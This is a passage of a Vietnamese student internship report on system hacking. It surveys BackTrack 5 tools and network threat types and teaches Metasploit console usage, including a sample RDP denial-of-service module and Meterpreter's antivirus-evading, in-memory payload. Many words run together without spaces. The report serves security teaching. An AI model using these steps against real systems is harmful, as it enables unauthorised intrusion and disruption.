1. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
1 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Mục Lục
CHƯƠNG I. GIỚI THIỆU VỀ BACKTRACK 5.............................................5
I. Giớithiệu.............................................................................................................................................5
II. Mụcđích.............................................................................................................................................6
CHƯƠNG 2. TÌNH HÌNH BẢO MẬT MẠNG LAN HIỆN NAY ..................7
I. Giớithiệu.......................................................................................................................................7
II. Vấnđềbảomậthệthốngvàmạng....................................................................................................7
CHƯƠNG 3. Tấn Công Hệ Thống –System Hacking ....................................13
I. Giới Thiệu Về Metasploit........................................................................13
1. Giới Thiệu..................................................................................................................................13
2. Các Thành Phần Của Metasploit................................................................................................13
3. Sử dụng Metasploit Framework.................................................................................................14
a) Chọn module exploit.............................................................................................................. 14
b) Cấu hình module exploit đã chọn........................................................................................... 14
c) Verify những options vừa cấu hình........................................................................................ 14
d) Lựa chọn target ...................................................................................................................... 14
e) Lựa chọn payload................................................................................................................... 14
f) Thựcthiexploit........................................................................................................................ 15
4. Giớithiệu Payload Meterpreter ..................................................................................................15
a) Sử dụng module Fs................................................................................................................. 15
b) Sử dụng module Net............................................................................................................... 16
c) Sử dụng module Process........................................................................................................ 16
d) Sử dụng module Sys............................................................................................................... 16
5. Cách phòng chống .....................................................................................................................16
II. Lỗi MS10-046 (2286198)..........................................................................16
2. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
2 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
1. Giới thiệu ...................................................................................................................................16
2. Các bước tấn công......................................................................................................................17
a. (mạng LAN)............................................................................................................................. 17
b. Triễn Khai trên vps................................................................................................................. 32
III. Cách phòng chống....................................................................................36
Tài Liệu Tham Khảo..........................................................................................36
3. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
3 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN
………………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
.……………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
….…………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…….………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
……….……………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
………….…………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…………….………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
……………….……………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
………………….…………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…………………….………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
……………………….……………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
………………………….…………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…………………………….
NGÀY… THÁNG… NĂM
4. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
4 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN
………………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
.……………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
….…………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…….………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
……….……………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
………….…………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…………….………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
……………….……………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
………………….…………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…………………….………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
……………………….……………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
………………………….…………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…………………………….
NGÀY… THÁNG… NĂM
5. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
5 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Lời Cảm Ơn
Em xin gởi lời cảm ơn chân thành và sự tri ân sâu sắc đối với các thầy
cô của Trung tâm đào tạo quản trị mạng và an ninh quốc tế ATHENA ,
đặc biệt là các thầy cô khoa Công Nghệ Thông Tin của trƣờng đã tạo
điều kiện cho em thực tập ở khoa để có nhiều thời gian cho khóa luận
tốt nghiệp. Và em cũng xin chân thành cám ơn thầy Võ Công Minh đã
nhiệt tình hƣớng dẫn hƣớng dẫn em hoàn thành tốt khóa thực tập.
Trong quá trình thực tập, cũng nhƣ là trong quá trình làm bài báo cáo,
khó tránh khỏi sai sót, rất mong các Thầy, Cô bỏ qua. Đồng thời do
trình độ lý luận cũng nhƣkinh nghiệm thực tiễn còn hạn chế nên bài
báo cáo không thể tránh khỏi những thiếu sót, em rất mong nhận
đƣợc ý kiến đóng góp Thầy, Cô để em học thêm đƣợc nhiều kinh
nghiệm và sẽ hoàn thành tốt hơn bài báo cáo tốt nghiệp sắp tới.
Em xin chân thành cảm ơn !
CHƢƠNGI. GIỚI THIỆU VỀ BACKTRACK 5
I. Giớithiệu
Backtrack làmộtbảnphânphốidạngLiveDVDcủaLinux,đượcpháttriểnđểthử nghiệm
thâm nhập.Trong các định dạng Live DVD, chúng ta sử dụng có thể Backtracktrực
tiếptừđĩaDVDmàkhôngcần càinóvào máycủachúngta.Backtrack cũngcó thểđượccài
đặt vàoổcứngvàsửdụngnhưmộthệđiềuhành.Backtracklà sự
hợpnhấtgiữa3bảnphânphốikhácnhaucủaLinuxvềthâmnhậpthửnghiệm -
IWHAX,WHOPPIX,và Auditor.Trongphiênbảnhiệntạicủanó(5),Backtrackđược
dựatrênphiênbảnphânphốiLinuxUbuntu11.10.Tínhđếnngày19thángbảynăm
2010,Backtrack5đãđượctảivềcủahơn1,5triệungườisửdụng.Phiên bảnmớinhất
làBacktrack5R2
6. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
6 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
II. Mụcđích
Công cụBacktrack đãcólịchsửpháttriểnkhálâuquanhiềubảnlinuxkhác
nhau.PhiênbảnhiệnnaysửdụngbảnphânphốiSlackwarelinux(TomasM.(www.slax.org))
.Backtrackliên tục cậpnhậtcáccôngcụ,drivers,...hiệntạiBacktrack
cótrên300côngcụphụcvụchoviệcnghiêncứubảomật.Backtracklàsựkếthợp
giữa2bộcôngcụkiểmthửbảo mậtrất nổitiếnglà WhaxvàAuditor.
Backtrack5chứamộtsốcôngcụcóthểđượcsửdụngtrongquátrìnhthử
nghiệmthâmnhậpcủachúngta.Cáccông cụkiểmtrathâmnhậptrongBacktrack5,0
cóthểđượcphânloạinhưsau:
Informationgathering: loạinàycóchứamộtsốcôngcụcóthểđượcsử dụng
đểcóđượcthôngtinliênquanđếnmộtmụctiêuDNS,định tuyến, địa chỉe-
mail,trangweb,máychủmail,vànhưvậy.Thôngtinnàyđượcthu
thậptừcácthôngtincósẵntrênInternet,màkhôngcầnchạmvàomôi
trườngmụctiêu.
Networkmapping:loạinàychứacáccôngcụcóthểđượcsửdụngđểkiểm
tracáchostđangtồntại,thông tinvềOS,ứngdụngđượcsửdụngbởimục
tiêu,vàcũnglàmportscanning.
Vulnerabilityidentification:Trongthểloạinày,chúngtacóthểtìmthấycác
côngcụđểquétcáclỗhổng(tổng hợp)vàtrongcácthiếtbịCisco. Nócũng
chứacáccôngcụđểthựchiệnvàphântíchServer MessageBlock(SMB) và
SimpleNetworkManagementProtocol(SNMP).
Webapplicationanalysis:loạinàychứacáccôngcụcóthểđượcsửdụng
trongtheodõi,giámsátcácứngdụngweb
Radionetworkanalysis:Đểkiểmtramạngkhôngdây,bluetoothvànhận dạng
tầnsốvôtuyến (RFID),chúngtacóthểsửdụng cáccôngcụtrongthể loạinày.
Penetration:loạinày chứacáccôngcụcóthểđượcsửdụngđểkhaitháccáclỗ
hổngtìmthấytrongcácmáytínhmụctiêu
Privilegeescalation: Saukhikhaitháccáclỗhổngvàđượctruycậpvàocác
máytínhmụctiêu,chúngtacóthểsửdụngcáccôngcụtrongloạinàyđể
nângcaođặcquyềncủachúngtachocácđặcquyềncaonhất.
Maintainingaccess:Côngcụtrongloạinàysẽcóthểgiúpchúngtatrong
việcduytrìquyềntruycậpvàocácmáytínhmụctiêu.Chúngtacóthểcần
7. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
7 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
đểcóđượcnhững đặcquyềncaonhấttrướckhicácchúngtacóthểcàiđặt
côngcụđểduytrì quyềntruycập
VoiceOverIP (VOIP):ĐểphântíchVOIP chúngtacóthểsửdụngcáccông
cụtrongthểloạinày
Digitalforensics:Trongloạinày,chúngtacóthểtìmthấy mộtsốcôngcụcó
thểđượcsửdụngđểlàmphântíchkỹthuậtnhưcóđượchìnhảnhđĩacứng,
cấutrúccáctậptin,vàphântíchhìnhảnhđĩacứng.Đểsửdụngcáccôngcụ
cungcấptrongthểloạinày,chúngtacóthểchọnStartBacktrackForensics
trongtrìnhđơnkhởiđộng.Đôikhisẽ đòihỏichúngta phảigắnkết nộibộđĩa
cứngvàcáctậptintraođổitrongchếđộchỉđọcđểbảotồntínhtoànvẹn.
Reverseengineering:Thểloạinàychứacáccôngcụcóthểđượcsửdụngđểgỡrốichư
ơngtrìnhmộthoặctháorời mộttập tinthựcthi.
CHƢƠNG 2.TÌNH HÌNH BẢO MẬT MẠNG LAN HIỆN NAY
I. Giớithiệu
Anninhantoànmạngmáytínhhoàntoànlàvấnđềconngười,dođóviệcđưa ramột
hànhlangpháplývàcácquy nguyêntắclàmviệccụthểlàcầnthiết.Ởđây, hành lang
pháplýcóthểgồm:cácđiềukhoảntrongbộluậtcủanhànước,cácvăn bản
dướiluật,...Còncácquyđịnhcóthểdotừngtổchứcđặtrachophùhợpvớitừng
đặcđiểmriêng.Cácquy địnhcóthểnhư:quy địnhvềnhânsự,việcsửdụng
máy,sửdụngphầnmềm,... Vànhưvậy,sẽhiệuquảnhấttrongviệcđảmbảoanninh an
toànchohệthốngmạngmáytínhmộtkhita thựchiệntriệt đểgiảiphápvề chính
sáchconngười.Tómlại,vấnđềanninhantoànmạngmáytínhlàmộtvấnđề lớn,nóyêu cầu
cầnphảicómộtgiảipháptổngthể,khôngchỉphầnmềm,phầncứng máytính
mànóđòihỏicảvấnđềchínhsáchvềconngười. Vàvấnđềnày cầnphải được thực
hiệnmộtcáchthườngxuyênliêntục,khôngbaogiờtriệtđểđượcvìnó luôn nảy
sinhtheothờigian.Tuynhiên,bằngcácgiảipháptổngthểhợplý,đặcbiệt là
giảiquyếttốtvấnđềchínhsáchvềconngườitacóthểtạorachomìnhsựan toàn chắcchắnhơn
II. Vấnđềbảomậthệthốngvàmạng
1. Cácvấn dềchung vềbảo mật hệthống và mạng
Đặcđiểmchungcủamộthệthốngmạnglàcónhiềungườisửdụngchung vàphântánvề
mặt địa lýnênviệcbảovệtàinguyên(mất máthoặcsửdụngkhông
hợplệ)phứctạphơnnhiềusovớiviệcmôitrườngmộtmáytínhđơnlẻ,hoặc
8. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
8 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
mộtngườisửdụng.Hoạtđộngcủangườiquảntrịhệthốngmạngphảiđảmbảocác
thôngtintrênmạnglàtincậyvàsửdụngđúngmụcđích,đốitượngđồngthờiđảmbảo
mạnghoạtđộngổnđịnhkhôngbịtấncôngbởinhữngkẻpháhoại.Nhưngtrênthựctế
làkhôngmộtmạngnàođảmbảolàantoàntuyệtđối,mộthệthốngdùđượcbảovệ chắcchắnđến
mứcnàothìcũngcó lúcbịvôhiệuhóabởinhữngkẻcó ýđồxấu.
2. Một số kháiniệmvà lịch sử bảo mật hệthống
a)Đối tượngtấn công mạng (intruder)
Đốitượng lànhững cánhânhoặctổchứcsửdụngnhững kiến thứcvề mạngvà
cáccôngcụpháhoại(gồm phần cứnghoặcphầnmềm) đểdòtìmcácđiểm yếuvà cáclỗhổng
bảomậttrênhệthống,thựchiệncáchoạtđộngxâmnhậpvà
chiếmđoạttàinguyêntráiphép.Mộtsốđốitượngtấncôngmạngnhư:Hacker:lànhững
kẻxâmnhậpvàomạngtráiphépbằngcáchsửdụngcáccôngcụphámậtkhẩuhoặc khai thác
cácđiểmyếucủa thànhphầntruynhậptrên hệthốngMasquerader:Lànhững
kẻgiảmạothông tintrênmạng nhưgiảmạođịachỉIP, tênmiền,địnhdanhngười
dùng…Eavesdropping:Lànhữngđốitượngnghetrộmthôngtintrênmạng,sử dụngcác
côngcụSniffer,sauđódùngcáccôngcụphântíchvàdebugđểlấyđược cácthôngtincógiátrị.
Nhữngđốitượngtấncôngmạngcóthểnhằmnhiềumụcđích
khácnhaunhưăncắpcácthôngtincógiátrịvềkinhtế,pháhoạihệthốngmạngcó chủ
định,hoặccóthểđólà nhữnghànhđộngvôýthức…
b)Các lỗhổngbảomật
Cáclỗhổngbảomậtlànhữngđiểmyếutrênhệthốnghoặcẩnchứa trongmột
dịchvụmàdựavàođókẻtấncôngcóthểxâmnhậptráiphépvàohệthống
đểthựchiệnnhữnghànhđộngpháhoạichiếmđoạttàinguyênbấthợppháp.Cónhiều
nguyênnhângây ranhữnglỗhổngbảomật:cóthểdolỗicủabảnthân hệthống,hoặc
phầnmềmcungcấphoặcngườiquảntrịyếukémkhônghiểusâu vềcácdịchvụcung
cấp…Mứcđộảnhhưởngcủacáclỗhổngtớihệ thốnglàkhácnhau.Cólỗhổngchỉảnh
hưởngtớichấtlượngdịchvụcungcấp,cólỗhổngảnhhưởngtớitoànbộhệthốnghoặc
pháhủyhệ thống
c)Chính sách bảomật
Chínhsáchbảomậtlàtậphợpcácquytắcápdụngchonhữngngười
thamgiaquảntrị mạng,cósửdụngcáctàinguyênvàcácdịchvụmạng.
9. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
9 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Đốivớitừngtrườnghợpphảicóchínhsáchbảomậtkhácnhau.Chính sáchbảo
mậtgiúpngườisửdụngbiếttráchnhiệmcủamìnhtrongviệc
bảovệcáctàinguyêntrênmạng,đồngthờicòngiúpchonhàquảntrịmạngthiếtlập
cácbiênphápđảm bảohữuhiệutrongquátrìnhtrangbị,cấuhìnhvàkiểmsoáthoạt
độngcủahệthốngvà mạng.
3. Các loạilỗ hổng bảomật vàphƣơng thứctấn công mạng chủ yếu
a)Các loại lỗ hổng
Cónhiềucáctổchứcđãtiếnhànhphânloạicácdạnglỗhổngđặcbiệt.
TheobộquốcphòngMỹcácloạilỗhổngđượcphânlàmbaloạinhưsau:
LỗhổngloạiC
ChophépthựchiệncáchìnhthứctấncôngtheoDoS(Denial ofServices-Từ chốidịch
vụ)Mứcđộnguyhiểmthấp chỉ ảnh hưởngtớichấtlượngdịchvụ,làmngưng
trệ,giánđoạnhệthống,khônglàmpháhỏngdữliệuhoặcđạtđượcquyềntruy cậpbất
hợppháp.DoSlàhìnhthứctấncôngsửdụngcácgiaothứcởtầngInternettrongbộgiao
thứcTCP/IP đểlàmhệthốngngưngtrệdẫnđếntìnhtrạngtừchốingườisửdụng hợp
pháptruynhậphaysửdụnghệthống.Cácdịchvụcólỗhổngchophépcáccuộctấn
côngDoScóthểđượcnângcấphoặcsửachữabằngcácphiênbản mớihơncủacácnhàcung
cấp dịch vụ. Hiệnnay chưa có một biện pháp hữu hiệu nào để khắc phục tình trạng tấn
công kiểu nàyvì bản thân thiết kế ở tầng Internet (IP) nói riêng và bộ giao thức
TCP/IP nói chungđã ẩn chứa những nguy cơ tiềm tang của các lỗ hổng loại này.
Lỗ hổng loại B:
Cho phép người sử dụng có thêm các quyền trên hệ thống mà không cần kiểm
tra tính hợp lệ dẫn đến mất mát thông tin yêu cầu cần bảo mật.Lỗ hổng này thường có
trong các ứng dụng trên hệ thống .Có mức độ nguy hiểm là trung bình.Lỗ hổng loại B
này có mức độ nguy hiểm hơn lỗ hổng loại C. Cho phépngười sử dụng nội bộ có thể
chiếm được quyền cao hơn hoặc truy nhậpkhônghợp pháp.
Những lỗ hổng loại này thường xuất hiện trong các dịch vụ trên hệ
thống.Ngườ sử dụng local được hiểu là người đã có quyền truy nhập vào hệ thống
vớimột số quyền hạn nhất định.Tìm hiểu vấn đề bảo mật mạng LAN. Một dạng khác
của lỗ hổng loại B xảy ra với các chương trình viết bằng mã nguồn C. Những chương
10. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
10 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
trình viết bằng mã nguồn C thường sử dụng một vùngđệm, một vùng trong bộ nhớ sử
dụng để lưu trữ dữ liệu trước khi xử lý. Người lậptrình thường sử dụng vùng đệm
trong bộ nhớ trước khi gán một khoảng không gian bộ nhớ cho từng khối dữ liệu. Ví
dụ khi viết chương trình nhập trường tên người sửdụng quy định trường này dài 20 ký
tự bằng khai báo:Charfirst_name [20]; Khai báo này cho phép người sử dụng nhập tối
đa 20ký tự. Khi nhập dữ liệu ban đầu dữ liệu được lưu ở vùng đệm. Khi người sử
dụngnhập nhiều hơn 20 ký tự sẽ tràn vùng đệm.Những ký tự nhập thừa sẽ nằm
ngoàivùng đệm khiến ta không thể kiểm soát được.Nhưng đối với những kẻ tấn
côngchúng có thể lợi dụng những lỗ hổng này để nhập vào những ký tự đặc biệt để
thựcthi một số lệnh đặc biệt trên hệ thống. Thông thường những lỗ hổng này được
lợidụng bởi những người sử dụng trên hệ thống để đạt được quyền root không hợp
lệ.Để hạn chế được các lỗ hổng loại B phải
kiêm soát chặt chẽ cấu hình hệ thống vàcác chương trình.
Lỗ hổng loại A
Cho phép người ngoài hệ thống có thể truy cập bất hợp phápvào hệ thống.Có
thể làm phá huỷ toàn bộ hệ thống.Loại lỗ hổng này có mức độ rấtnguy hiểm đe dọa
tính toàn vẹn và bảo mật của hệ thống.Các lỗ hổng này thườngxuất hiện ở những hệ
thống quản trị yếu kém hoặc không kiểm soát được cấu hìnhmạng.Những lỗ hổng
loại này hết sức nguy hiểm vì nó đã tồn tại sẵn có trên phầnmềm sử dụng, người quản
trị nếu không hiểu sâu về dịch vụ và phần mềm sử dụngcó thể bỏ qua điểm yếu
này.Vì vậy thường xuyên phải kiểm tra các thông báo củacác nhóm tin về bảo mật
trên mạng để phát hiện những lỗ hổng loại này. Một loạtcác chương trình phiên bản
cũ thường sử dụng có những lỗ hổng loại A như: FTP,Gopher, Telnet, Sendmail,
ARP, finger.
b)Cáchìnhthứctấncôngmạngphổbiến
Scanner
Scannerlàmộtchươngtrìnhtựđộngràsoátvàpháthiệnnhữngđiểmyếuvề
bảomậttrênmộttrạmlàmviệccụcbộhoặcmộttrạm ởxa.Mộtkẻpháhoạisửdụng
chươngtrìnhScannercóthểpháthiệnranhững lỗhổngvềbảomậttrênmộtServerdù
ởxa.Cơchếhoạtđộnglàràsoátvàpháthiện nhữngcổngTCP/UDPđượcsửdụngtrên
hệthốngcầntấncôngvàcácdịchvụsửdụngtrênhệthốngđó.Scanner ghilạinhững đáp
ứngtrênhệthốngtừxatương ứngvớidịch vụmànóphát hiệnra.Từđónócóthể
tìmrađiêmyếucủahệthống.NhữngyếutốđểmộtScannerhoạtđộngnhưsau:Yêu
11. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
11 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
cầuthiếtbịvàhệthống: Môitrường cóhỗtrợTCP/IPHệthốngphảikếtnốivàomạng
Internet.CácchươngtrìnhScannercóvaitròquantrọngtrong mộthệthốngbảo mật,vì
chúngcókhảnăngpháthiệnranhữngđiểmyếukémtrênmộthệ thốngmạng.
PasswordCracker
Làmộtchươngtrìnhcó khảnănggiảimãmộtmậtkhẩuđã đượcmãhoáhoặccó
thểvôhiệu hoá chứcnăngbảo vệmậtkhẩu của mộthệthống.Mộtsốchươngtrìnhphá
khoácónguyêntắchoạtđộngkhácnhau.Mộtsốchương trìnhtạoradanhsáchcáctừ
giớihạn,áp dụngmộtsố thuậttoán mãhoátừkết quảso sánhvớiPasswordđãmãhoá
cầnbẻkhoáđểtạoramộtdanhsáchkháctheomộtlogiccủachươngtrình.Khithấy
phùhợpvớimậtkhẩuđãmãhoá,kẻpháhoạiđãcóđượcmậtkhẩudướidạngtext.
Mậtkhẩutextthôngthườngsẽđượcghivàomộtfile.Biệnphápkhắcphụcđốivới
cáchthứcpháhoạinàylàcầnxâydựngmộtchínhsáchbảovệ mậtkhẩuđúngđắn.
Sniffer
Snifferlàcáccôngcụ(phầncứnghoặcphầnmềm)”bắt”cácthôngtin
lưuchuyểntrênmạngvàlấycácthôngtincógiátrịtraođổitrênmạng.Sniffer cóthể
“bắt”đượccácthôngtintraođổigiữanhiềutrạmlàmviệc vớinhau. Thựchiệnbắtcác
góitintừtầngIP trởxuống.GiaothứcởtầngIP đượcđịnhnghĩacôngkhai,và cấutrúc
cáctrườngheaderrõràng,nênviệcgiảimãcácgóitinnàykhôngkhókhăn.
Mụcđíchcủacácchươngtrìnhsniffer đólàthiếtlậpchếđộpromiscuous(mode
dùngchung)trêncáccardmạngethernet-nơicácgóitintraođổitrongmạng -từđó
"bắt"đượcthôngtin.Các thiếtbịsniffer cóthểbắtđượctoànbộthôngtintraođổitrên
mạnglàdựavàonguyêntắcbroadcast (quảngbá)cácgọitintrongmạngEthernet.Tuy
nhiênviệcthiếtlậpmộthệthốngsniffer không phảiđơngiảnvìcầnphảixâm nhập
đượcvàohệthốngmạngđóvàcàiđặtcácphầnmềmsniffer.Đồng thờicácchương
trìnhsniffercũngyêucầungườisửdụngphảihiểusâu vềkiếntrúc,cácgiaothức
mạng.Việcpháthiệnhệthốngbịsnifferkhôngphảiđơngiản,vìsnifferhoạtđộngở
tầngrấtthấp,vàkhôngảnhhưởngtớicácứngdụngcũngnhưcácdịchvụhệthốngđócungcấp.T
uynhiênviệcxâydựngcácbiệnpháphạnchếsniffercũngkhôngquá
khókhănnếutatuânthủcácnguyêntắcvề bảo mậtnhư:
Khôngchongườilạtruynhậpvàocácthiếtbịtrênhệthống
Quảnlýcấuhìnhhệthốngchặtchẽ
12. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
12 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Thiếtlậpcáckếtnốicó tínhbảomậtcaothôngquacáccơchế mãhoá.
Trojans
Trojans làmộtchươngtrìnhchạykhônghợplệtrênmộthệthống.Vớivaitrò
nhưmộtchươngtrìnhhợppháp.Trojansnàycóthểchạy đượclàdocácchươngtrình
hợpphápđãbịthayđổimãcủanóthànhmãbấthợppháp.Vídụnhưcácchươngtrình
viruslàloạiđiểnhìnhcủaTrojans.Nhữngchươngtrìnhvirus thường chedấucácđoạn
mãtrongcácchươngtrìnhsửdụnghợppháp.Khinhữngchươngtrìnhnày đượckích
hoạtthìnhững đoạnmãẩndấusẽthực thivàchúng thựchiệnmộtsốchứcnăngmà
ngườisửdụngkhôngbiếtnhư:ăncắpmậtkhẩuhoặccopy filemàngườisửdụngnhư
tathườngkhônghaybiết.MộtchươngtrìnhTrojanssẽ thựchiệnmộttrongnhữngcông
việcsau:
Thựchiệnmộtvàichứcnănghoặcgiúpngườilậptrìnhlênnóphát hiệnnhững
thôngtinquantrọng hoặcnhững thôngtincánhântrênmộthệthốnghoặcchỉ trênmột
vàithànhphầncủahệthốngđó.
Chedấumộtvàichứcnăng hoặc làgiúpngười lậptrìnhpháthiệnnhữngthông
tinquantrọnghoặcnhữngthôngtincánhântrênmộthệthốnghoặcchỉtrênmột vài
thànhphầncủahệthống.Ngoàiracòncócácchương trìnhTrojancóthểthựchiện
đựợccảhaichứcnăngnày.Cóchương trìnhTrojancòncóthểpháhủy hệthốngbằng cách
pháhoạicácthôngtintrênổcứng.NhưngngàynaycácTrojanskiểunàydễdàng
bịpháthiệnvàkhópháthuyđượctácdụng.Tuy nhiêncónhữngtrườnghợpnghiêm
trọnghơnnhữngkẻtấncôngtạo ranhữnglỗ hổngbảomậtthôngqua Trojansvàkẻ tấn
cônglấyđượcquyềnroottrênhệthốngvàlợidụngquyềnđóđểpháhủymộtphần
hoặctoànbộhệthốnghoặcdùngquyềnrootđểthayđổilogfile,càiđặtcácchương
trìnhtrojanskhácmàngườiquảntrịkhôngthểpháthiệnđượcgâyramứcđộảnh
hưởngrấtnghiêmtrọngvàngườiquảntrịchỉcòncáchcàiđặtlạitoànbộhệthống.
13. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
13 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
CHƢƠNG 3. Tấn Công Hệ Thống –System Hacking
I. Giới Thiệu Về Metasploit
1. Giới Thiệu
Metasploit là một dự án bảo mật máy tính cung cấp các thông tin
về vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra thâm
nhập và phát triển hệ thống phát hiện tấn công mạng. Một dự án
con rất nổi tiếng của Metasploit là Metasploit Framework.
Metasploit Framework là một môi trường dùng để kiểm tra ,tấn
công và khai thác lỗi của các service. Metasploit được xây dựng
từ ngôn ngữ hướng đối tượng Perl, với những components được
viết bằng C, assembler, và Python.Metasploit có thể chạy trên
hầu hết các hệ điều hành: Linux, Windows, MacOS
2. Các Thành Phần Của Metasploit
Metasploit hỗ trợ nhiều giao diện với người dùng:
Consoleinterface: dùng lệnh msfconsole. Msfconsole
interface sử dụng các dòng lệnh để cấu hình, kiểm tra nên
nhanh hơn và mềm dẻo hơn
Webinterface: dùng msfweb, giao tiếp với người dùng thông
qua giao diện web
Commandlineinterface: dùng msfcli
Enviroment:
GlobalEnviroment:được thực thi thông qua 2 câu lệnh setg
và unsetg, những options được gán ở đây sẽ mang tính toàn
cục, được đưa vào tất cả các module exploits
TemporaryEnviroment: được thực thi thông qua 2 câu lệnh
set và unset, enviroment này chỉ được đưa vào module exploit
đang load hiện tại, không ảnh hưởng đến các module exploit
khác
Chúng có thể lưu lại enviroment mình đã cấu hình thông qua lệnh
save. Môi trường đó sẽ được lưu trong ./msf/config và sẽ được load
trở lại khi user interface được thực hiện
14. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
14 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
3. Sử dụng Metasploit Framework
a) Chọn module exploit
Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để
khai thác
show exploits: xem các module exploit mà
framework có hỗ trợ
useexploit_name: chọn module exploit
infoexploit_name: xem thông tin về module
exploit
Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ
cũng như các module trên www.metasploit.com hoặc
qua lệnh msfupdate hoặc svn update /opt/metasploit/msf3/
b) Cấu hình module exploit đã chọn
showoptions: Xác định những options nào cần cấu hình.
set : cấu hình cho những option của module đó
Một vài module còn có những advanced options, chúng ta có thể
xem bằng cách gõ dòng lệnh showadvanceds
c) Verify những options vừa cấu hình
check:kiểm tra xem những option đã được set chính xác
chưa.
d) Lựa chọn target
Lựa chọn hệ diều hành nào để thực hiện
showtargets: những target được cung cấp bởi module đó
set: xác định target nào
vd: msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
e) Lựa chọn payload
Payloadlàđoạncodemàsẽchạytrênhệthốngremotemachine,làmột
phầncủavirusmáytínhđểthựcthimãđộc.
showpayloads:liệtkêranhữngpayloadcủa
moduleexploithiệntại
15. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
15 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
infopayload_name:xemthôngtinchitiếtvề payloadđó
Set payload payload_name:
xácđịnhpayloadmodulename.Saukhi
lựachọnpayloadnào,dùnglệnh showoptionsđểxem những
options củapayloadđó
showadvanced:xemnhữngadvancedoptionscủapayloadđó
f) Thựcthiexploit
exploit:lệnhdùngđểthựcthipayloadcode.Payloadsauđósẽcung
cấpchochúngtanhữngthôngtinvềhệthốngđượckhaithác
4. Giớithiệu Payload Meterpreter
MeterpreterviếttắttừMeta-
Interpreterlàmộtpayloadnângcaocótrong
MetasploitFramework.Mụcđíchcủanólàđểcungcấpnhữngtậplệnhđ
ểkhaithác tấncângcácmáyremote
computers.Nóđượcviếttừcácdevelopers dướidạngshared
object(DLL)files.Meterpretervà
cácthànhphầnmởrộngđượcthựcthitrongbộnhớ, hoàntoànkhông
đượcghilênđĩanên cóthể tránhđượcsựphát hiệntừcácphầnmềm
chốngvirus.
Meterpretercungcấpmộttậplệnhđểchúngtacóthểkhaitháctrêncách
remote computers:
Fs(Filesystem):cungcấpquátrìnhtươngtácvớifilesystem
Net: cho phépxemthôngtinmạngcủa
remotemachinenhưIP,route table
Process:cho phép tạo tương tác với các tiến trình trên remote
machine
Sys: cho phép xem thông tin hệ thống, môi trường của
remote machine
a) Sử dụng module Fs
cd directory:giống lệnh cd của commandline, chuyển thư
mục làm việc
16. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
